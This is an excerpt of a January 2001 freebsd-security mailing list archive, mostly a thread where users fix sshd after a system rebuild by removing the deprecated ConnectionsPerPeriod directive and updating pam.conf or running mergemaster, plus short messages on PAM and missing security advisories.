In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Oh, crap. That's EXACTLY what was happening. Looks like it's time for another compile. Duh. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: Scott Hilton [mailto:kupek@earthlink.net] > Sent: Wednesday, January 24, 2001 6:36 PM > To: scott@link-net.com; freebsd-security@freebsd.org > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > What's wrong with OpenSSH? The only problem I encountered > with it was the > following message when trying to start it: > > fatal: ConnectionsPerPeriod has been deprecated > > > I was looking around for a few minutes, and found the following: > > ================================================================= > = Changes from previous versions = > ================================================================= > > 2.3.0: > We link with OpenSSL 0.9.6 now. > > Diffs from the FreeBSD version are not distributed right > now (but will be). > > ConnectionsPerPeriod is currently not integrated. > Consider using MaxStartups instead. If you still need > ConnectionsPerPeriod, bug me and I may do it. > > > I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config > and sshd loaded > without any problems. > > > > -----Original Message----- > Yeah, now if I could just figure out what was wrong with the openssh > implementation in the core system. Openssh (ports tree > version) has an > annoying install sequence - you can't define where it gets > installed, so > the files get installed to the hard-coded directory tree /usr/local. > The non-working core system one normally installs sshd to > /usr/sbin and > the config files to /etc/ssh. > > What bugs me is that when this gets fixed it's going to take another 4 > hours of compiling and installing. > > Bah. > > -- > Scott > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 21:33:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from harmony.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id EC93737B400 for ; Wed, 24 Jan 2001 21:33:35 -0800 (PST) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.11.1/8.11.1) with ESMTP id f0P5X4964941; Wed, 24 Jan 2001 22:33:09 -0700 (MST) (envelope-from imp@harmony.village.org) Message-Id: <200101250533.f0P5X4964941@harmony.village.org> To: Fernando Schapachnik Subject: Re: full PAM support for login, rshd, and su Cc: Mark Murray , "David J. MacKenzie" , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 18 Jan 2001 11:11:46 -0300." <200101181411.LAA86494@ns1.via-net-works.net.ar> References: <200101181411.LAA86494@ns1.via-net-works.net.ar> Date: Wed, 24 Jan 2001 22:33:04 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200101181411.LAA86494@ns1.via-net-works.net.ar> Fernando Schapachnik writes: : Anyway, it appears that the current ftpd is going to be replaced by : the NetBSD ftpd in a few days. No. It isn't. There are lots of issues to work out before that happens. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 22:51:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 9395F37B402 for ; Wed, 24 Jan 2001 22:50:55 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com; Wed, 24 Jan 2001 22:50:54 -0800 Reply-To: From: "Scott Raymond" To: "Scott Hilton" Cc: Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) Date: Wed, 24 Jan 2001 22:50:54 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, once I was finished I ran into the same problem. I did a bit of research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting your old one. That fixed it for me - and all that was needed for the fix was the config file. No reboots or restarting sshd necessary. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: Scott Hilton [mailto:kupek@earthlink.net] > Sent: Wednesday, January 24, 2001 7:32 PM > To: scott@link-net.com > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > hey, I just got another error when trying to log into sshd... > getting "no > modules loaded for 'sshd' service" and "fatal: PAM session > setup failed(6): > Permission denied" > > Let me know if you get the same thing... > > > -----Original Message----- > From: Scott Raymond [mailto:scott@link-net.com] > Sent: Wednesday, January 24, 2001 7:10 PM > To: Scott Hilton; freebsd-security@freebsd.org > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > Oh, crap. That's EXACTLY what was happening. > > Looks like it's time for another compile. Duh. > > -- > Scott > ======================= > Scott Raymond > http://soundamerica.com > ======================= > > > > -----Original Message----- > > From: Scott Hilton [mailto:kupek@earthlink.net] > > Sent: Wednesday, January 24, 2001 6:36 PM > > To: scott@link-net.com; freebsd-security@freebsd.org > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > What's wrong with OpenSSH? The only problem I encountered > > with it was the > > following message when trying to start it: > > > > fatal: ConnectionsPerPeriod has been deprecated > > > > > > I was looking around for a few minutes, and found the following: > > > > ================================================================= > > = Changes from previous versions = > > ================================================================= > > > > 2.3.0: > > We link with OpenSSL 0.9.6 now. > > > > Diffs from the FreeBSD version are not distributed right > > now (but will be). > > > > ConnectionsPerPeriod is currently not integrated. > > Consider using MaxStartups instead. If you still need > > ConnectionsPerPeriod, bug me and I may do it. > > > > > > I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config > > and sshd loaded > > without any problems. > > > > > > > > -----Original Message----- > > Yeah, now if I could just figure out what was wrong with the openssh > > implementation in the core system. Openssh (ports tree > > version) has an > > annoying install sequence - you can't define where it gets > > installed, so > > the files get installed to the hard-coded directory tree /usr/local. > > The non-working core system one normally installs sshd to > > /usr/sbin and > > the config files to /etc/ssh. > > > > What bugs me is that when this gets fixed it's going to > take another 4 > > hours of compiling and installing. > > > > Bah. > > > > -- > > Scott > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 23: 3:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 080C237B402 for ; Wed, 24 Jan 2001 23:02:58 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0P76QA49828; Wed, 24 Jan 2001 23:06:26 -0800 (PST) (envelope-from kris) Date: Wed, 24 Jan 2001 23:06:26 -0800 From: Kris Kennaway To: Scott Raymond Cc: Scott Hilton , freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010124230626.A49802@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jI8keyz6grp/JLjh" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from scott@link-net.com on Wed, Jan 24, 2001 at 07:09:32PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jI8keyz6grp/JLjh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 24, 2001 at 07:09:32PM -0800, Scott Raymond wrote: > Oh, crap. That's EXACTLY what was happening. >=20 > Looks like it's time for another compile. Duh. No, it's a configuration directive. Kris > > following message when trying to start it: > > > > fatal: ConnectionsPerPeriod has been deprecated --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --jI8keyz6grp/JLjh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6b9ByWry0BWjoQKURAsFuAJwMp1xbO3beO/LNonE2b30hGuNwSQCg+eUH OiI5WEYj7D7cz1NeNrkt8d0= =wLcW -----END PGP SIGNATURE----- --jI8keyz6grp/JLjh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 1: 7:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from www-student.eit.ihk.dk (www-student.eit.ihk.dk [194.182.124.149]) by hub.freebsd.org (Postfix) with ESMTP id 975C537B400 for ; Thu, 25 Jan 2001 01:07:27 -0800 (PST) Received: (from xride@localhost) by www-student.eit.ihk.dk (8.11.0/8.11.0) id f0P97T426419 for freebsd-security@freebsd.org; Thu, 25 Jan 2001 10:07:29 +0100 (CET) Date: Thu, 25 Jan 2001 10:07:29 +0100 From: Me To: freebsd-security@freebsd.org Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010125100729.A26350@www-student.eit.ihk.dk> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from scott@link-net.com on Wed, Jan 24, 2001 at 10:50:54PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Use mergemaster .. I find's it to risky to just do a blind copy.. Soren. On Wed, Jan 24, 2001 at 10:50:54PM -0800, Scott Raymond wrote: > Yes, once I was finished I ran into the same problem. I did a bit of > research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting > your old one. That fixed it for me - and all that was needed for the > fix was the config file. No reboots or restarting sshd necessary. > > -- > Scott > ======================= > Scott Raymond > http://soundamerica.com > ======================= > > > > -----Original Message----- > > From: Scott Hilton [mailto:kupek@earthlink.net] > > Sent: Wednesday, January 24, 2001 7:32 PM > > To: scott@link-net.com > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > hey, I just got another error when trying to log into sshd... > > getting "no > > modules loaded for 'sshd' service" and "fatal: PAM session > > setup failed(6): > > Permission denied" > > > > Let me know if you get the same thing... > > > > > > -----Original Message----- > > From: Scott Raymond [mailto:scott@link-net.com] > > Sent: Wednesday, January 24, 2001 7:10 PM > > To: Scott Hilton; freebsd-security@freebsd.org > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > Oh, crap. That's EXACTLY what was happening. > > > > Looks like it's time for another compile. Duh. > > > > -- > > Scott > > ======================= > > Scott Raymond > > http://soundamerica.com > > ======================= > > > > > > > -----Original Message----- > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > Sent: Wednesday, January 24, 2001 6:36 PM > > > To: scott@link-net.com; freebsd-security@freebsd.org > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > What's wrong with OpenSSH? The only problem I encountered > > > with it was the > > > following message when trying to start it: > > > > > > fatal: ConnectionsPerPeriod has been deprecated > > > > > > > > > I was looking around for a few minutes, and found the following: > > > > > > ================================================================= > > > = Changes from previous versions = > > > ================================================================= > > > > > > 2.3.0: > > > We link with OpenSSL 0.9.6 now. > > > > > > Diffs from the FreeBSD version are not distributed right > > > now (but will be). > > > > > > ConnectionsPerPeriod is currently not integrated. > > > Consider using MaxStartups instead. If you still need > > > ConnectionsPerPeriod, bug me and I may do it. > > > > > > > > > I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config > > > and sshd loaded > > > without any problems. > > > > > > > > > > > > -----Original Message----- > > > Yeah, now if I could just figure out what was wrong with the openssh > > > implementation in the core system. Openssh (ports tree > > > version) has an > > > annoying install sequence - you can't define where it gets > > > installed, so > > > the files get installed to the hard-coded directory tree /usr/local. > > > The non-working core system one normally installs sshd to > > > /usr/sbin and > > > the config files to /etc/ssh. > > > > > > What bugs me is that when this gets fixed it's going to > > take another 4 > > > hours of compiling and installing. > > > > > > Bah. > > > > > > -- > > > Scott > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 1:25:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 2737E37B404 for ; Thu, 25 Jan 2001 01:25:09 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com; Thu, 25 Jan 2001 01:25:08 -0800 Reply-To: From: "Scott Raymond" To: "Me" , Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) Date: Thu, 25 Jan 2001 01:25:08 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010125100729.A26350@www-student.eit.ihk.dk> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I had kept that in mind before I did so. In fact, the research I did suggested that I compare the file from the source tree and the existing one in /etc and make changes to the one in /etc. I discovered that instead of editing the old one, it was simply easier to just copy the file over from the source path since the only difference was the addition of sshd entries. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Me > Sent: Thursday, January 25, 2001 1:07 AM > To: freebsd-security@freebsd.org > Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > Use mergemaster .. > > I find's it to risky to just do a blind copy.. > > Soren. > > On Wed, Jan 24, 2001 at 10:50:54PM -0800, Scott Raymond wrote: > > Yes, once I was finished I ran into the same problem. I > did a bit of > > research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting > > your old one. That fixed it for me - and all that was > needed for the > > fix was the config file. No reboots or restarting sshd necessary. > > > > -- > > Scott > > ======================= > > Scott Raymond > > http://soundamerica.com > > ======================= > > > > > > > -----Original Message----- > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > Sent: Wednesday, January 24, 2001 7:32 PM > > > To: scott@link-net.com > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > hey, I just got another error when trying to log into sshd... > > > getting "no > > > modules loaded for 'sshd' service" and "fatal: PAM session > > > setup failed(6): > > > Permission denied" > > > > > > Let me know if you get the same thing... > > > > > > > > > -----Original Message----- > > > From: Scott Raymond [mailto:scott@link-net.com] > > > Sent: Wednesday, January 24, 2001 7:10 PM > > > To: Scott Hilton; freebsd-security@freebsd.org > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > Oh, crap. That's EXACTLY what was happening. > > > > > > Looks like it's time for another compile. Duh. > > > > > > -- > > > Scott > > > ======================= > > > Scott Raymond > > > http://soundamerica.com > > > ======================= > > > > > > > > > > -----Original Message----- > > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > > Sent: Wednesday, January 24, 2001 6:36 PM > > > > To: scott@link-net.com; freebsd-security@freebsd.org > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > What's wrong with OpenSSH? The only problem I encountered > > > > with it was the > > > > following message when trying to start it: > > > > > > > > fatal: ConnectionsPerPeriod has been deprecated > > > > > > > > > > > > I was looking around for a few minutes, and found the following: > > > > > > > > > ================================================================= > > > > = Changes from previous versions > = > > > > > ================================================================= > > > > > > > > 2.3.0: > > > > We link with OpenSSL 0.9.6 now. > > > > > > > > Diffs from the FreeBSD version are not distributed right > > > > now (but will be). > > > > > > > > ConnectionsPerPeriod is currently not integrated. > > > > Consider using MaxStartups instead. If you still need > > > > ConnectionsPerPeriod, bug me and I may do it. > > > > > > > > > > > > I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config > > > > and sshd loaded > > > > without any problems. > > > > > > > > > > > > > > > > -----Original Message----- > > > > Yeah, now if I could just figure out what was wrong > with the openssh > > > > implementation in the core system. Openssh (ports tree > > > > version) has an > > > > annoying install sequence - you can't define where it gets > > > > installed, so > > > > the files get installed to the hard-coded directory > tree /usr/local. > > > > The non-working core system one normally installs sshd to > > > > /usr/sbin and > > > > the config files to /etc/ssh. > > > > > > > > What bugs me is that when this gets fixed it's going to > > > take another 4 > > > > hours of compiling and installing. > > > > > > > > Bah. > > > > > > > > -- > > > > Scott > > > > > > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 1:45: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 12F5837B402 for ; Thu, 25 Jan 2001 01:44:22 -0800 (PST) Received: (qmail 2132 invoked by uid 1000); 25 Jan 2001 09:42:29 -0000 Date: Thu, 25 Jan 2001 11:42:29 +0200 From: Peter Pentchev To: Scott Raymond Cc: Me , freebsd-security@freebsd.org Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010125114228.B578@ringworld.oblivion.bg> Mail-Followup-To: Scott Raymond , Me , freebsd-security@freebsd.org References: <20010125100729.A26350@www-student.eit.ihk.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from scott@link-net.com on Thu, Jan 25, 2001 at 01:25:08AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You'd be better off running mergemaster anyway, after (or before) EVERY world build/install cycle. Now God only knows how far your /etc has strayed from the updated one, and how many programs may break or malfunction in subtle ways :) G'luck, Peter -- What would this sentence be like if pi were 3? On Thu, Jan 25, 2001 at 01:25:08AM -0800, Scott Raymond wrote: > I had kept that in mind before I did so. In fact, the research I did > suggested that I compare the file from the source tree and the existing > one in /etc and make changes to the one in /etc. I discovered that > instead of editing the old one, it was simply easier to just copy the > file over from the source path since the only difference was the > addition of sshd entries. > > -- > Scott > ======================= > Scott Raymond > http://soundamerica.com > ======================= > > > > -----Original Message----- > > From: owner-freebsd-security@FreeBSD.ORG > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Me > > Sent: Thursday, January 25, 2001 1:07 AM > > To: freebsd-security@freebsd.org > > Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > Use mergemaster .. > > > > I find's it to risky to just do a blind copy.. > > > > Soren. > > > > On Wed, Jan 24, 2001 at 10:50:54PM -0800, Scott Raymond wrote: > > > Yes, once I was finished I ran into the same problem. I > > did a bit of > > > research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting > > > your old one. That fixed it for me - and all that was > > needed for the > > > fix was the config file. No reboots or restarting sshd necessary. > > > > > > -- > > > Scott > > > ======================= > > > Scott Raymond > > > http://soundamerica.com > > > ======================= > > > > > > > > > > -----Original Message----- > > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > > Sent: Wednesday, January 24, 2001 7:32 PM > > > > To: scott@link-net.com > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > hey, I just got another error when trying to log into sshd... > > > > getting "no > > > > modules loaded for 'sshd' service" and "fatal: PAM session > > > > setup failed(6): > > > > Permission denied" > > > > > > > > Let me know if you get the same thing... > > > > > > > > > > > > -----Original Message----- > > > > From: Scott Raymond [mailto:scott@link-net.com] > > > > Sent: Wednesday, January 24, 2001 7:10 PM > > > > To: Scott Hilton; freebsd-security@freebsd.org > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > Oh, crap. That's EXACTLY what was happening. > > > > > > > > Looks like it's time for another compile. Duh. > > > > > > > > -- > > > > Scott > > > > ======================= > > > > Scott Raymond > > > > http://soundamerica.com > > > > ======================= > > > > > > > > > > > > > -----Original Message----- > > > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > > > Sent: Wednesday, January 24, 2001 6:36 PM > > > > > To: scott@link-net.com; freebsd-security@freebsd.org > > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > > > > What's wrong with OpenSSH? The only problem I encountered > > > > > with it was the > > > > > following message when trying to start it: > > > > > > > > > > fatal: ConnectionsPerPeriod has been deprecated > > > > > > > > > > > > > > > I was looking around for a few minutes, and found the following: > > > > > > > > > > > > ================================================================= > > > > > = Changes from previous versions > > = > > > > > > > ================================================================= > > > > > > > > > > 2.3.0: > > > > > We link with OpenSSL 0.9.6 now. > > > > > > > > > > Diffs from the FreeBSD version are not distributed right > > > > > now (but will be). > > > > > > > > > > ConnectionsPerPeriod is currently not integrated. > > > > > Consider using MaxStartups instead. If you still need > > > > > ConnectionsPerPeriod, bug me and I may do it. > > > > > > > > > > > > > > > I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config > > > > > and sshd loaded > > > > > without any problems. > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > Yeah, now if I could just figure out what was wrong > > with the openssh > > > > > implementation in the core system. Openssh (ports tree > > > > > version) has an > > > > > annoying install sequence - you can't define where it gets > > > > > installed, so > > > > > the files get installed to the hard-coded directory > > tree /usr/local. > > > > > The non-working core system one normally installs sshd to > > > > > /usr/sbin and > > > > > the config files to /etc/ssh. > > > > > > > > > > What bugs me is that when this gets fixed it's going to > > > > take another 4 > > > > > hours of compiling and installing. > > > > > > > > > > Bah. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 2:36:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 39E9837B402 for ; Thu, 25 Jan 2001 02:36:06 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com; Thu, 25 Jan 2001 02:36:05 -0800 Reply-To: From: "Scott Raymond" To: "Peter Pentchev" Cc: "Me" , Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) Date: Thu, 25 Jan 2001 02:36:05 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010125114228.B578@ringworld.oblivion.bg> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just did that as per your suggestion. I did a "mergemaster -a -i", and followed the instructions in the FreeBSD handbook for updating /dev and /stand. Seems to have worked out pretty well, and everything is up to date. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Pentchev > Sent: Thursday, January 25, 2001 1:42 AM > To: Scott Raymond > Cc: Me; freebsd-security@freebsd.org > Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > You'd be better off running mergemaster anyway, after (or before) > EVERY world build/install cycle. Now God only knows how far your /etc > has strayed from the updated one, and how many programs may break or > malfunction in subtle ways :) > > G'luck, > Peter > > -- > What would this sentence be like if pi were 3? > > On Thu, Jan 25, 2001 at 01:25:08AM -0800, Scott Raymond wrote: > > I had kept that in mind before I did so. In fact, the > research I did > > suggested that I compare the file from the source tree and > the existing > > one in /etc and make changes to the one in /etc. I discovered that > > instead of editing the old one, it was simply easier to > just copy the > > file over from the source path since the only difference was the > > addition of sshd entries. > > > > -- > > Scott > > ======================= > > Scott Raymond > > http://soundamerica.com > > ======================= > > > > > > > -----Original Message----- > > > From: owner-freebsd-security@FreeBSD.ORG > > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Me > > > Sent: Thursday, January 25, 2001 1:07 AM > > > To: freebsd-security@freebsd.org > > > Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > Use mergemaster .. > > > > > > I find's it to risky to just do a blind copy.. > > > > > > Soren. > > > > > > On Wed, Jan 24, 2001 at 10:50:54PM -0800, Scott Raymond wrote: > > > > Yes, once I was finished I ran into the same problem. I > > > did a bit of > > > > research - copy /usr/src/etc/pam.conf to /etc/pam.conf > - overwriting > > > > your old one. That fixed it for me - and all that was > > > needed for the > > > > fix was the config file. No reboots or restarting sshd > necessary. > > > > > > > > -- > > > > Scott > > > > ======================= > > > > Scott Raymond > > > > http://soundamerica.com > > > > ======================= > > > > > > > > > > > > > -----Original Message----- > > > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > > > Sent: Wednesday, January 24, 2001 7:32 PM > > > > > To: scott@link-net.com > > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > > > > hey, I just got another error when trying to log into sshd... > > > > > getting "no > > > > > modules loaded for 'sshd' service" and "fatal: PAM session > > > > > setup failed(6): > > > > > Permission denied" > > > > > > > > > > Let me know if you get the same thing... > > > > > > > > > > > > > > > -----Original Message----- > > > > > From: Scott Raymond [mailto:scott@link-net.com] > > > > > Sent: Wednesday, January 24, 2001 7:10 PM > > > > > To: Scott Hilton; freebsd-security@freebsd.org > > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > > > > > > > > > > > > > Oh, crap. That's EXACTLY what was happening. > > > > > > > > > > Looks like it's time for another compile. Duh. > > > > > > > > > > -- > > > > > Scott > > > > > ======================= > > > > > Scott Raymond > > > > > http://soundamerica.com > > > > > ======================= > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > From: Scott Hilton [mailto:kupek@earthlink.net] > > > > > > Sent: Wednesday, January 24, 2001 6:36 PM > > > > > > To: scott@link-net.com; freebsd-security@freebsd.org > > > > > > Subject: RE: OpenSSH b0rked (was RE: Problems with > IPFW patch) > > > > > > > > > > > > > > > > > > What's wrong with OpenSSH? The only problem I encountered > > > > > > with it was the > > > > > > following message when trying to start it: > > > > > > > > > > > > fatal: ConnectionsPerPeriod has been deprecated > > > > > > > > > > > > > > > > > > I was looking around for a few minutes, and found > the following: > > > > > > > > > > > > > > > ================================================================= > > > > > > = Changes from previous versions > > > = > > > > > > > > > ================================================================= > > > > > > > > > > > > 2.3.0: > > > > > > We link with OpenSSL 0.9.6 now. > > > > > > > > > > > > Diffs from the FreeBSD version are not distributed right > > > > > > now (but will be). > > > > > > > > > > > > ConnectionsPerPeriod is currently not integrated. > > > > > > Consider using MaxStartups instead. If you still need > > > > > > ConnectionsPerPeriod, bug me and I may do it. > > > > > > > > > > > > > > > > > > I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config > > > > > > and sshd loaded > > > > > > without any problems. > > > > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > Yeah, now if I could just figure out what was wrong > > > with the openssh > > > > > > implementation in the core system. Openssh (ports tree > > > > > > version) has an > > > > > > annoying install sequence - you can't define where it gets > > > > > > installed, so > > > > > > the files get installed to the hard-coded directory > > > tree /usr/local. > > > > > > The non-working core system one normally installs sshd to > > > > > > /usr/sbin and > > > > > > the config files to /etc/ssh. > > > > > > > > > > > > What bugs me is that when this gets fixed it's going to > > > > > take another 4 > > > > > > hours of compiling and installing. > > > > > > > > > > > > Bah. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 3: 7:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from dirac.th.physik.uni-bonn.de (dirac.th.physik.uni-bonn.de [131.220.161.119]) by hub.freebsd.org (Postfix) with SMTP id A0B6637B699 for ; Thu, 25 Jan 2001 03:07:04 -0800 (PST) Received: (qmail 70104 invoked from network); 25 Jan 2001 11:06:58 -0000 Received: from merlin.th.physik.uni-bonn.de (131.220.161.121) by dirac.th.physik.uni-bonn.de with SMTP; 25 Jan 2001 11:06:58 -0000 Received: (qmail 97336 invoked by uid 145); 25 Jan 2001 11:06:58 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jan 2001 11:06:58 -0000 Date: Thu, 25 Jan 2001 12:06:57 +0100 (CET) From: Jan Conrad To: freebsd-security@freebsd.org Subject: Where did FreeBSD-SA-01:07 and 10 go? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi there, I am subscribed to freebsd-security, freebsd-announce and Bugtrag On Bugtrag two security announcements appeared: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 FreeBSD 